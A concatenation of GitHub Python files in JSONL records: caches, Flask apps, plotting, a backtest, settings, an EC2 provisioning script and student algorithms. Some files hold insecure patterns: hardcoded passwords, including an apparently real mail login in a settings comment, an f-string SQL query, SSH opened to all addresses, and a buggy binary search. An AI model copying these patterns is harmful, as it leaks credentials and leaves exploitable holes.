+{"seq_id":"70749416164","text":"from typing import Counter, TypeVar, Generic\n\nT = TypeVar(\"T\")\n\n\nclass Node(object):\n def __init__(self, key, val: T):\n self.key = key\n self.val = val\n self.prev = None\n self.next = None\n\n\nclass LRUCache:\n def __init__(self, capacity) -> None:\n self.capacity = capacity\n self.head = None\n self.tail = None\n self.items = {} # 用來存放 key 對應的 Node, 這樣就不用花 O(n) 的時間搜尋key 對應的 Node\n\n '''將 cur_node 移至鏈表頭部'''\n\n def move_cur_node_to_haed(self, cur_node):\n cur_node.next = self.head\n self.head.prev = cur_node\n self.head = cur_node\n\n def put(self, key, val: T):\n # key 不存在, 將新增的 Node 新增至鏈表頭部\n if key not in self.items.keys():\n newNode = Node(key, val)\n self.items[key] = newNode\n # 第一次新增 Node, 指定 head 跟 tail\n if self.head is None and self.tail is None:\n self.head = newNode\n self.tail = newNode\n else:\n self.move_cur_node_to_haed(newNode)\n # 新增 Node 以後, 超過鏈表的長度需將 tail Node 刪除,以維護 capacity\n if len(self.items) > self.capacity:\n tail_node = self.tail\n # 將 items 對應的 tail_node.key 刪除\n self.items.pop(tail_node.key)\n # 變更 tail 指標\n self.tail = tail_node.prev\n self.tail.next = None\n del tail_node\n # key 存在, 根據 node 為 head、tail、others 做以下變更\n else:\n cur_node = self.items[key]\n cur_node.val = val\n # 該 node 為 head 只要直接設定 node.val 即可\n # 該 Node 為 tail\n if cur_node is self.tail:\n # 變更 tail 指標\n self.tail = cur_node.prev\n self.tail.next = None\n # 將 cur_node 移至鏈表頭部\n self.move_cur_node_to_haed(cur_node)\n # 該 node 不為 head 也不為 tail\n elif cur_node is not self.head:\n prev_node = cur_node.prev\n next_node = cur_node.next\n prev_node.next = next_node\n next_node.prev = prev_node\n # 將 cur_node 移至鏈表頭部\n self.move_cur_node_to_haed(cur_node)\n\n '''\n key 對應的 node 為: \n 1. head, 則直接回傳 node.val\n 2. tail, 變更 tail 指標, 並將 node 移至鏈表頭部\n 3. others, 將 node 從原本位置刪除,並移至鏈表頭部\n '''\n\n def get(self, key):\n if key in self.items.keys():\n cur_node = self.items[key]\n # 該 Node 為 tail\n if cur_node is self.tail:\n # 如果 cur_node tail node, 則變更 tail 指摽指向 cur_node.prev\n self.tail = cur_node.prev\n self.tail.next = None\n # 將 cur_node 移至鏈表頭部\n self.move_cur_node_to_haed(cur_node)\n # 該 node 不為 head 也不為 tail\n elif cur_node is not self.head:\n # 將 cur_node 從原本位置刪除\n prev_node = cur_node.prev\n next_node = cur_node.next\n prev_node.next = next_node\n next_node.prev = prev_node\n # 將 cur_node 移至鏈表頭部\n self.move_cur_node_to_haed(cur_node)\n\n return cur_node.val\n else:\n return -1\n\n def __repr__(self):\n result = []\n cur_node = self.head\n while cur_node is not None:\n result.append(str(cur_node.val))\n cur_node = cur_node.next\n return '->'.join(result)\n\n\nif __name__ == \"__main__\":\n lru_cache = LRUCache(3)\n lru_cache.put('30', 'curry')\n lru_cache.put('23', 'Green')\n lru_cache.put('0', 'Payton')\n print(lru_cache)\n\n print(f\"get(0): {lru_cache.get('0')}\")\n print(lru_cache)\n\n print(f\"get(30): {lru_cache.get('30')}\")\n print(lru_cache)\n\n print(f\"get(0): {lru_cache.get('0')}\")\n print(lru_cache)\n\n print(f\"put(11): {lru_cache.put('11','Thompson')}\")\n print(lru_cache)\n\n print(f\"{lru_cache.put('0','Arenas')}\")\n print(lru_cache)\n\n print(f\"{lru_cache.put('30','Wallace')}\")\n print(lru_cache)\n","repo_name":"youngjay9/algorithm_for_python","sub_path":"linkedlist/leetCode/LRUCache.py","file_name":"LRUCache.py","file_ext":"py","file_size_in_byte":4421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73687749605","text":"import os\nimport flask\nfrom flask import current_app,Flask\n# from flask import flask, current_app\nimport arhamcollection_app.config as Config\n\n\nfrom .common import constants as COMMON_CONSTANTS\n\nfrom .main_app.views import main_app as ma\nfrom .user_management.views import user_management as um\nfrom .user_management.models import User\n\nfrom .main_app.errorhandling import *\nfrom arhamcollection_app.extensions import db,principal,login_manager,mail,csrf\n\n\n__all__ = ['create_app']\n\n\nDEFAULT_BLUEPRINTS = [\n ma,um\n]\n\ndef create_app(config=None, app_name=None,blueprints=None):\n if app_name is None:\n app_name=Config.DevelopmentConfig.PROJECT\n if blueprints is None:\n blueprints=DEFAULT_BLUEPRINTS\n app = Flask(app_name, instance_path=COMMON_CONSTANTS.INSTANCE_FOLDER_PATH, instance_relative_config=True)\n configure_app(app, config=None)\n configure_blueprints(app, blueprints)\n configure_extensions(app)\n app.register_error_handler(404,page_not_found_404)\n app.register_error_handler(403,page_not_found_403)\n app.register_error_handler(500,page_not_found_500)\n return app\n\n\ndef configure_blueprints(app, blueprints):\n for blueprint in blueprints:\n app.register_blueprint(blueprint)\n\n\n\ndef configure_extensions(app):\n # pass\n print('INITIALIZING APP DATABASE')\n db.init_app(app)\n\n mail.init_app(app)\n principal.init_app(app)\n login_manager.init_app(app)\n csrf.init_app(app)\n # celery.init_app(app)\n login_manager.login_view = \"user_management.login\"\n\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n\ndef configure_app(app, config=None):\n\n app.config.from_object(Config.DevelopmentConfig)\n \n if config:\n app.config.from_object(config)\n return\n\n # application_mode = os.getenv('APPLICATION_MODE', 'LOCAL')\n # app.config.from_object(Config.get_config(application_mode))\n","repo_name":"findsarfaraz/arhamcollections","sub_path":"arhamcollection_app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32485146161","text":"import json\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n\ndef plot1(train_accuracy, validation_accuracy, train_loss, validation_loss):\n plt.figure(figsize=(4, 2))\n\n plt.subplot(121)\n plt.ylabel(\"Loss\")\n plt.xlabel(\"Epoch\")\n plt.plot(range(len(train_loss)), train_loss, label=\"train\")\n plt.plot(range(len(validation_loss)), validation_loss, label=\"valid\")\n\n plt.subplot(122)\n plt.ylabel(\"Accuracy\")\n plt.xlabel(\"Epoch\")\n plt.plot(range(len(train_accuracy)), train_accuracy, label=\"train\")\n plt.plot(range(len(validation_accuracy)), validation_accuracy, label=\"valid\")\n plt.gca().legend(loc=\"lower right\")\n\n plt.show()\n\n\ndef plot2(tacc,vacc,tloss,vloss):\n Epoch_count=len(tloss)\n Epochs=[]\n for i in range (0,Epoch_count):\n Epochs.append(i+1)\n index_loss=np.argmin(vloss)\n val_lowest=vloss[index_loss]\n index_acc=np.argmax(vacc)\n val_highest=vacc[index_acc]\n plt.style.use('fivethirtyeight')\n sc_label='best epoch= '+ str(index_loss+1)\n vc_label='best epoch= '+ str(index_acc + 1)\n fig,axes=plt.subplots(nrows=1, ncols=2, figsize=(15,5))\n axes[0].plot(Epochs,tloss, 'r', label='Training loss')\n axes[0].plot(Epochs,vloss,'g',label='Validation loss' )\n axes[0].scatter(index_loss+1,val_lowest, s=150, c= 'blue', label=sc_label)\n axes[0].set_title('Training and Validation Loss')\n axes[0].set_xlabel('Epochs')\n axes[0].set_ylabel('Loss')\n axes[0].legend()\n axes[1].plot (Epochs,tacc,'r',label= 'Training Accuracy')\n axes[1].plot (Epochs,vacc,'g',label= 'Validation Accuracy')\n axes[1].scatter(index_acc+1,val_highest, s=150, c= 'blue', label=vc_label)\n axes[1].set_title('Training and Validation Accuracy')\n axes[1].set_xlabel('Epochs')\n axes[1].set_ylabel('Accuracy')\n axes[1].legend()\n plt.tight_layout\n #plt.style.use('fivethirtyeight')\n plt.show()\n\n\nif __name__ == '__main__':\n history = json.load(open(\"history.json.txt\", 'r'))\n\n plot1(history[\"accuracy\"], history[\"val_accuracy\"], history[\"loss\"], history[\"val_loss\"])\n #plot2(history[\"accuracy\"], history[\"val_accuracy\"], history[\"loss\"], history[\"val_loss\"])","repo_name":"PiotrTrawinski/ChessClassification","sub_path":"plothelper.py","file_name":"plothelper.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26337995819","text":"import bottle\n\nfrom ddserver.utils.deps import extend, require\n\n\n\n@extend('ddserver.config:ConfigDeclaration')\ndef config_captcha(config_decl):\n with config_decl.declare('captcha') as s:\n s('enabled',\n conv = bool,\n default = False)\n s('recaptcha_public_key',\n conv = str,\n default = '')\n s('recaptcha_private_key',\n conv = str,\n default = '')\n\n\n\ndef captcha_check(__on_error__):\n ''' Checks if the captcha challenge and response in the request are matching.\n\n The challenge and response values are extracted from the POST data and\n passed to the recaptcha API.\n\n @param __on_error__: The target to redirect if the check failed\n '''\n\n def wrapper(func):\n @require(config = 'ddserver.config:Config',\n users = 'ddserver.interface.user:UserManager',\n messages = 'ddserver.interface.message:MessageManager')\n def wrapped(config,\n users,\n messages,\n *args,\n **kwargs):\n if config.captcha.enabled:\n from recaptcha.client import captcha\n\n challenge = bottle.request.POST.pop('recaptcha_challenge_field', None)\n response = bottle.request.POST.pop('recaptcha_response_field', None)\n\n if challenge is None or response is None:\n messages.error('Captcha values are missing')\n bottle.redirect('/')\n\n result = captcha.submit(challenge,\n response,\n config.captcha.recaptcha_private_key,\n bottle.request.remote_addr)\n\n if not result.is_valid:\n messages.error('Captcha invalid')\n bottle.redirect(__on_error__)\n\n # Call the wrapped function\n return func(*args,\n **kwargs)\n\n return wrapped\n return wrapper\n","repo_name":"ddserver/ddserver","sub_path":"ddserver/interface/captcha.py","file_name":"captcha.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"43321103593","text":"import psycopg2\n\nfrom decrease_herbivorous import decrease_herbivorous\n\ndef start_transaction(cursor):\n cursor.execute('BEGIN')\n\ndef finish_transaction(db, cursor):\n cursor.execute('COMMIT')\n db.commit\n\ndef is_there_enough_food( cursor, num, sector_id ):\n print('SECTOR ID:', sector_id, type(sector_id))\n cursor.execute(f\"SELECT food FROM sectors WHERE id = {sector_id}\")\n food = cursor.fetchone()\n print(\"FOOD:\", food)\n if food: \n if food[0] - num >= 0: return True\n return False\n\ndef decrease_food( db, cursor, sector_id, infl_f ):\n print('decrease food')\n try:\n f = 1 + infl_f\n if is_there_enough_food( cursor, f, sector_id ):\n print('herb food update')\n cursor.execute(\"UPDATE sectors SET food = food - (%s) WHERE id=(%s)\", (f, sector_id, ))\n db.commit()\n else:\n decrease_herbivorous(db, cursor, sector_id)\n return False\n except psycopg2.Error as e:\n print('Error update', str(e))\n return False\n return True\n\ndef increase_amount( db, cursor, sector_id, user_id, infl_a ):\n print('increase amount')\n try:\n a = 1 + infl_a\n cursor.execute(\"UPDATE creatures SET amount = amount + (%s) WHERE user_id=(%s) AND sector_id=(%s)\", (a, user_id, sector_id, ))\n db.commit()\n except psycopg2.Error as e:\n print('Error update', str(e))\n return False\n return True\n\ndef herbivorous_skill( db, cursor, record, influence ):\n infl_f = influence['food']\n infl_a = influence['amount']\n if decrease_food( db, cursor, record[0], infl_f ):\n increase_amount( db, cursor, record[0], record[1], infl_a )\n\n","repo_name":"Larskaya/lena-api-evolution","sub_path":"methods/herbivorous.py","file_name":"herbivorous.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8332192894","text":"import os\nfrom flask import Flask, request, abort, jsonify\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_cors import CORS\nimport random\n\nfrom models import db, setup_db, Question, Category\n\nQUESTIONS_PER_PAGE = 10\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__)\n setup_db(app)\n\n CORS(app)\n\n @app.after_request\n def after_request(response):\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization,true')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PATCH,POST,DELETE,OPTIONS')\n return response\n\n '''\n Endpoints\n '''\n\n @app.route('/categories')\n def get_all_categories():\n categories = Category.query.all()\n return jsonify({\n 'success': True,\n 'categories': [category.format() for category in categories],\n 'total_categories': len(categories)\n })\n\n @app.route('/questions')\n def get_paginated_questions():\n page = request.args.get('page', 1, type=int)\n questions = Question.query.order_by('id').all()\n paginated_questions = questions[(page-1)*QUESTIONS_PER_PAGE:page*QUESTIONS_PER_PAGE]\n categories = Category.query.all()\n if len(paginated_questions) > 0:\n return jsonify({\n 'success': True,\n 'questions': [question.format() for question in paginated_questions],\n 'total_questions': len(questions),\n 'categories': [category.format() for category in categories],\n 'current_category': None\n })\n else:\n abort(404, 'The requested page is beyond the valid range.')\n\n @app.route('/questions/', methods=['DELETE'])\n def delete_question(question_id):\n success = True\n question = Question.query.get(question_id)\n\n if question is None:\n abort(422, 'The question does not exist.')\n\n try:\n question.delete()\n except Exception as e:\n db.session.rollback()\n success = False\n finally:\n db.session.close()\n\n if success:\n return jsonify({\n 'success': True,\n 'id': question_id\n })\n else:\n abort(500, 'The question could not be deleted.')\n\n @app.route('/questions', methods=['POST'])\n def add_new_question():\n success = True\n\n search_term = request.json.get('search_term', None)\n if search_term is not None:\n matching_questions = Question.query.filter(Question.question.ilike(f'%{search_term}%')).all()\n return jsonify({\n 'success': True,\n 'questions': [question.format() for question in matching_questions],\n 'total_questions': len(matching_questions),\n 'current_category': None\n })\n\n question = request.json.get('question', None)\n if question is None:\n abort(400, 'Missing field \\'question\\'.')\n\n answer = request.json.get('answer', None)\n if answer is None:\n abort(400, 'Missing field \\'answer\\'.')\n\n category = request.json.get('category', None)\n if category is None:\n abort(400, 'Missing field \\'category\\'.')\n\n difficulty = request.json.get('difficulty', None)\n if difficulty is None:\n abort(400, 'Missing field \\'difficulty\\'.')\n\n existing_question = Question.query.filter(Question.question.ilike(question)).first()\n if existing_question is not None:\n abort(409, 'The question already exists.')\n\n try:\n new_question = Question(\n question=question,\n answer=answer,\n category=category,\n difficulty=difficulty\n )\n new_question.insert()\n except Exception as e:\n db.session.rollback()\n success = False\n finally:\n db.session.close()\n\n if success:\n return jsonify({\n 'success': True\n }), 201\n else:\n abort(500, 'Adding the question to the database was unsuccessful.')\n\n @app.route('/categories//questions')\n def get_questions_by_category(category_id):\n category = Category.query.get(category_id)\n if category is None:\n abort(422, 'The requested category does not exist.')\n\n filtered_questions = Question.query.filter(Question.category == category_id).all()\n return jsonify({\n 'success': True,\n 'questions': [question.format() for question in filtered_questions],\n 'total_questions': len(filtered_questions),\n 'current_category': category_id\n })\n\n @app.route('/quizzes', methods=['POST'])\n def get_quiz_question():\n print(request.json)\n category_id = request.json.get('category', None)\n if category_id is not None:\n category = Category.query.get(category_id)\n if category is None:\n abort(422, 'The requested category does not exist.')\n\n previous_questions = request.json.get('previous_questions', [])\n random_question = Question.get_random_question(previous_questions, category_id)\n\n response = {\n 'success': True,\n 'current_category': category_id\n }\n try:\n response['question'] = random_question.format()\n except AttributeError:\n response['question'] = None\n\n return jsonify(response)\n\n '''\n Error handlers\n '''\n\n @app.errorhandler(400)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': error.description\n }), 400\n\n @app.errorhandler(404)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 404,\n 'message': error.description\n }), 404\n\n @app.errorhandler(409)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 409,\n 'message': error.description\n }), 409\n\n @app.errorhandler(422)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 422,\n 'message': error.description\n }), 422\n\n @app.errorhandler(500)\n def resource_not_found(error):\n return jsonify({\n 'success': False,\n 'error': 500,\n 'message': error.description\n }), 500\n\n return app\n","repo_name":"csaba-schmidtmayer/trivia_api","sub_path":"backend/flaskr/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15511864770","text":"import backtrader as bt\r\nimport talib\r\n\r\n\r\nclass RSIStrategy(bt.Strategy):\r\n\r\n def __init__(self):\r\n self.rsi = talib.RSI(self.data, period=14)\r\n\r\n # size = amount of coin to buy (etc. BTC)\r\n def next(self):\r\n if self.rsi < 30 and not self.position:\r\n self.buy(size=0.0000001)\r\n if self.rsi > 70 and self.position:\r\n self.close()\r\n\r\n\r\nclass SmaCross(bt.Strategy):\r\n # list of parameters which are configurable for the strategy\r\n params = dict(\r\n pfast=1, # period for the fast moving average\r\n pslow=270 # period for the slow moving average\r\n )\r\n\r\n def __init__(self):\r\n sma1 = bt.ind.SMA(period=self.p.pfast) # fast moving average\r\n sma2 = bt.ind.SMA(period=self.p.pslow) # slow moving average\r\n self.crossover = bt.ind.CrossOver(sma1, sma2) # crossover signal\r\n\r\n def next(self):\r\n if not self.position: # not in the market\r\n if self.crossover > 0: # if fast crosses slow to the upside\r\n self.buy(size=5.4) # enter long\r\n\r\n\r\n\r\n elif self.crossover < 0: # in the market & cross to the downside\r\n self.close() # close long position\r\n\r\n\r\ncerebro = bt.Cerebro()\r\n\r\ndata = bt.feeds.GenericCSVData(dataname='BNB_MIN.csv', dtformat=2)\r\n\r\ncerebro.adddata(data)\r\n\r\ncerebro.addstrategy(SmaCross)\r\n\r\ncerebro.run()\r\n\r\ncerebro.plot()\r\n","repo_name":"Izzy90/trading_bot","sub_path":"backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74965444324","text":"def get_db_uri(dbinfo):\n username = dbinfo.get('user') or \"root\"\n password = dbinfo.get('pwd') or \"111111\"\n host = dbinfo.get('host') or \"localhost\"\n port = dbinfo.get('port') or \"3306\"\n database = dbinfo.get('dbname') or \"Enjoythin\"\n driver = dbinfo.get('driver') or \"pymysql\"\n dialect = dbinfo.get('dialect') or \"mysql\"\n\n return \"{}+{}://{}:{}@{}:{}/{}\".format(dialect, driver, username, password, host, port, database)\n\n\nclass Config():\n DEBUG = False\n TESTING = False\n SECRET_KEY = '110'\n SESSION_TYPE = 'redis'\n SQLALCHEMY_TRACK_MODIFICATIONS = False\n DEBUG_TB_INTERCEPT_REDIRECTS = False\n\n\nclass DevelopConfig(Config):\n DEBUG = True\n # MAIL_SERVER = \"smtp.163.com\"\n # MAIL_USERNAME = \"m18937610182@163.com\"\n # MAIL_PASSWORD = \"19910320hu\"\n\n DATABASE = {\n \"user\": \"root\",\n \"pwd\": \"111111\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3306\",\n \"dialect\": \"mysql\",\n \"driver\": \"pymysql\",\n \"dbname\": \"Enjoythin\",\n\n }\n\n SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nclass TestingConfig(Config):\n TESTING = True\n\n DATABASE = {\n \"user\": \"root\",\n \"pwd\": \"111111\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3306\",\n \"dialect\": \"mysql\",\n \"driver\": \"pymysql\",\n \"dbname\": \"Enjoythin\",\n\n }\n\n SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nclass ShowConfig(Config):\n DEBUG = True\n\n DATABASE = {\n \"user\": \"root\",\n \"pwd\": \"111111\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3306\",\n \"dialect\": \"mysql\",\n \"driver\": \"pymysql\",\n \"dbname\": \"Enjoythin\",\n\n }\n\n SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nclass ProductConfig(Config):\n DEBUG = True\n\n DATABASE = {\n \"user\": \"root\",\n \"pwd\": \"111111\",\n \"host\": \"127.0.0.1\",\n \"port\": \"3306\",\n \"dialect\": \"mysql\",\n \"driver\": \"pymysql\",\n \"dbname\": \"Enjoythin\",\n\n }\n\n SQLALCHEMY_DATABASE_URI = get_db_uri(DATABASE)\n\n\nconfig = {\n \"developConfig\": DevelopConfig,\n \"testingConfig\": TestingConfig,\n \"showConfig\": ShowConfig,\n \"productConfig\": ProductConfig,\n \"default\": DevelopConfig,\n}\n","repo_name":"Developerbaby/enjoythin","sub_path":"App/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15630628358","text":"def get_length_longest_substring(s: str):\n if len(s) == 0:\n return 0\n\n seen_chars = set()\n start = 0\n max_length = 1\n\n for i in range(len(s)):\n if s[i] in seen_chars:\n while s[start] != s[i]:\n seen_chars.remove(s[start])\n start +=1\n start +=1\n\n if i + 1 - start > max_length:\n max_length = i + 1 - start\n\n seen_chars.add(s[i])\n\n return max_length\n","repo_name":"JohnWebb4/toy_problems","sub_path":"src/longestSubstring/longestSubstring.py","file_name":"longestSubstring.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38518108596","text":"'''\r\nMoataz Khallaf A.K.A Hackerman\r\n03-recuBinSearch\r\n2/27/2019\r\n'''\r\nimport random\r\n\r\nli = [1, 2, 3, 4, 5, 15, 16, 17, 18, 19, 20, 30, 31, 32, 33, 34, 35, 36, 41, 42, 43, 43]\r\ndat = []\r\n\r\nfor i in range(500):\r\n\r\n if random.randrange(2) == 1:\r\n dat.append(i)\r\n\r\nnum = dat[random.randrange(len(dat))]\r\n\r\ndef binSearch(arr, value):\r\n midpoint = len(arr)//2\r\n if arr[midpoint] == value:\r\n return arr[1]\r\n else:\r\n if arr[midpoint] < value:\r\n arr = arr[midpoint:]\r\n else:\r\n arr = arr[:midpoint]\r\n return binSearch(arr, value)\r\n\r\n\r\n\r\nprint(binSearch(dat, num))\r\n\r\n''' Mr.Zhang's method\r\ndef recBinSearch(li, val)\r\n mid = (len(li)-1)//2\r\n if li[midP] == val:\r\n return li[midP]\r\n if val < li[midP]:\r\n return recBinSearch(li[:midP])\r\n else: val > li[midP]:\r\n return recBinSearch(li[midP+1:])\r\n\r\n\r\n\r\n'''","repo_name":"taz717/CSE3310_lessons","sub_path":"03-recuBinSearch.py","file_name":"03-recuBinSearch.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40443199031","text":"import boto3\nimport paramiko\nimport time\nfrom botocore.exceptions import ClientError\nfrom os import path\n\n\nSECURITY_GROUP_NAME = 'BigDataProjectSecurityGroup'\nSECURITY_GROUP_DESCRIPTION = 'This is Security group for our BigData project'\nKEY_PAIR_FILE_NAME = 'BigDataProject-ec2-keypair'\nUSERNAME = 'ec2-user'\n\ndef initInstance() :\n print(\"Starting init EC2 instance ...\")\n key_pair_file_name = KEY_PAIR_FILE_NAME\n instance_public_dns = createEc2Instance(key_pair_file_name)\n client = connectInstance(key_pair_file_name, instance_public_dns)\n installPackets(client)\n sendEc2WorkerPythonFiles(client)\n startEc2Worker(client)\n \n print(\"Init Ec2 instance done.\")\n return client\n\n\ndef createEc2Instance(key_pair_file_name) :\n ec2_ressource = boto3.resource('ec2')\n ec2_client = boto3.client('ec2')\n\n vpcs = ec2_client.describe_vpcs()\n vpc_id = vpcs.get('Vpcs', [{}])[0].get('VpcId', '')\n print('VpcId= %s' % vpc_id)\n\n ###### Create ec2 key pair ######\n\n # call the boto ec2 function to create a key pair\n key_pair = ec2_ressource.create_key_pair(KeyName=key_pair_file_name)\n\n # create a file to store the key locally\n outfile = open(key_pair_file_name,'w')\n\n # capture the key and store it in a file\n KeyPairOut = str(key_pair.key_material)\n print(KeyPairOut)\n outfile.write(KeyPairOut)\n\n\n ###### Create ec2 security group ######\n\n try:\n response = ec2_client.create_security_group(GroupName=SECURITY_GROUP_NAME,\n Description=SECURITY_GROUP_DESCRIPTION,\n VpcId=vpc_id)\n security_group_id = response['GroupId']\n print('Security Group Created %s in vpc %s.' % (security_group_id, vpc_id))\n\n data = ec2_client.authorize_security_group_ingress(\n GroupId=security_group_id,\n IpPermissions=[\n {'IpProtocol': 'tcp',\n 'FromPort': 80,\n 'ToPort': 80,\n 'IpRanges': [{'CidrIp': '0.0.0.0/0'}]},\n {'IpProtocol': 'tcp',\n 'FromPort': 22,\n 'ToPort': 22,\n 'IpRanges': [{'CidrIp': '0.0.0.0/0'}]}\n ])\n print('Ingress Successfully Set %s' % data)\n except ClientError as e:\n print(e)\n\n\n ###### Create ec2 instance ######\n\n instances = ec2_ressource.create_instances(\n ImageId='ami-0c94855ba95c71c99',\n MinCount=1,\n MaxCount=1,\n InstanceType='t2.large',\n KeyName=key_pair_file_name,\n SecurityGroupIds=[\n security_group_id\n ]\n )\n\n instance = instances[0]\n\n print('Wait until running instance ...')\n instance.wait_until_running()\n print('Wait until initializing instance ...')\n time.sleep(20)\n\n # Reload the instance attributes\n instance.load()\n\n instance_id = instance.id\n instance_public_dns = instance.public_dns_name\n print('public_dns=%s' % instance_public_dns)\n\n return instance_public_dns\n\n# Penser à client.close()\ndef connectInstance(key_pair_file_name, instance_public_dns) :\n\n key = paramiko.RSAKey.from_private_key_file(key_pair_file_name)\n client = paramiko.SSHClient()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n\n # Connect/ssh to an instance\n try:\n print(\"Try to connect to ec2 instance ...\")\n client.connect(hostname=instance_public_dns, username=USERNAME, pkey=key, timeout=30, auth_timeout=30)\n return client\n except Exception as e:\n print(e)\n\ndef installPythonPackage(client,name):\n print(\"Installing: \"+name+\"...\")\n stdin, stdout, stderr = client.exec_command('sudo python3 -m pip install '+name)\n print(\"E : %s / O : %s\" %(stderr.read(), stdout.read()))\n \n\ndef installPackets(client) :\n print(\"Installing: python3 ...\")\n stdin, stdout, stderr = client.exec_command('sudo yum install python3 -y')\n print(\"E : %s / O : %s\" %(stderr.read(), stdout.read()))\n installPythonPackage(client,\"scikit-learn\")\n installPythonPackage(client,\"nltk\")\n installPythonPackage(client,\"numpy\")\n installPythonPackage(client,\"re\")\n installPythonPackage(client,\"pandas\")\n\n \n \n\ndef sendEc2WorkerPythonFiles(client) :\n print(\"Sending Ec2 Worker Python Files ...\")\n ftp_client=client.open_sftp()\n\n local_home = path.expanduser(\"~\")\n remote_home = \"/home/\"+USERNAME\n\n ftp_client.put('../processing/trainingTFIDF.py',remote_home+'/trainingTFIDF.py')\n ftp_client.put('../processing/utils.py',remote_home+'/utils.py')\n ftp_client.put('../processing/data.json',remote_home+'/data.json')\n ftp_client.put('../processing/label.csv',remote_home+'/label.csv')\n ftp_client.put('../processing/categories_string.csv',remote_home+'/categories_string.csv')\n\n\n ftp_client.close()\n print(\"Done sending all worker files.\")\n\ndef startEc2Worker(client) :\n print(\"Starting ec2 worker ...\")\n\n stdin, stdout, stderr = client.exec_command('python3 trainingTFIDF.py')\n print(\"E : %s / O : %s\" %(stderr.read(), stdout.read()))\n \n print(\"Starting ec2 worker ...\")\n\n\ndef fetchPredictFile(client):\n ftp_client=client.open_sftp()\n local_home = path.expanduser(\"~\")\n remote_home = \"/home/\"+USERNAME\n\n ftp_client.get(remote_home+'/predict.csv', '../result/predict.csv')\n ftp_client.close()\n print(\"Done fetching all worker files.\")\n\nif __name__ == \"__main__\":\n\n client=initInstance()\n \n fetchPredictFile(client)\n \n client.close()\n \n\n\n","repo_name":"AGENTHON/ProjetBigData","sub_path":"aws/initEc2Instance.py","file_name":"initEc2Instance.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33861172442","text":"\"\"\"\n57. Insert Interval\nhttps://leetcode.com/problems/insert-interval/\n\nGiven a set of non-overlapping intervals, insert a new interval into the intervals (merge if necessary).\n\nYou may assume that the intervals were initially sorted according to their start times.\n\nExample 1:\n\nInput: intervals = [[1,3],[6,9]], newInterval = [2,5]\nOutput: [[1,5],[6,9]]\nExample 2:\n\nInput: intervals = [[1,2],[3,5],[6,7],[8,10],[12,16]], newInterval = [4,8]\nOutput: [[1,2],[3,10],[12,16]]\nExplanation: Because the new interval [4,8] overlaps with [3,5],[6,7],[8,10].\n\n\"\"\"\n\nclass Solution:\n def insert(self, intervals: List[List[int]], newInterval: List[int]) -> List[List[int]]:\n res, n = [], newInterval \n for index, i in enumerate(intervals):\n if i[1] < n[0]:\n res.append(i) \n elif n[1] < i[0]:\n res.append(n)\n return res+intervals[index:]\n else:\n n[0] = min(n[0], i[0])\n n[1] = max(n[1], i[1]) \n res.append(n)\n return res\n \n \n\n","repo_name":"EvanTian233/Leetcode-solutions","sub_path":"Python_Solutions/Algorithms/1_2_SlidingWindow/InsertInterval.py","file_name":"InsertInterval.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39804977787","text":"import pdb\nfrom models.author import Author\nfrom models.book import Book\nimport repositories.author_repository as author_repository\nimport repositories.book_repository as book_repository\n\nbook_repository.delete_all()\nauthor_repository.delete_all()\n\n\nauthor_1 = Author(\"J.K\", \"Rowling\")\nauthor_repository.save(author_1)\n\nauthor_2 = Author(\"Stephen\", \"King\")\nauthor_repository.save(author_2)\n\nbook_1 = Book(\"The Philosopher's Stone\", \"Fantasy\", author_1)\nbook_repository.save(book_1)\n\nbook_2 = Book(\"The Chamber of Secrets\", \"Fantasy\", author_1)\nbook_repository.save(book_2)\n\nbook_3 = Book(\"The Prisoner of Azkaban\", \"Fantasy\", author_1)\nbook_repository.save(book_3)\n\nbook_4 = Book(\"Misery\", \"Horror\", 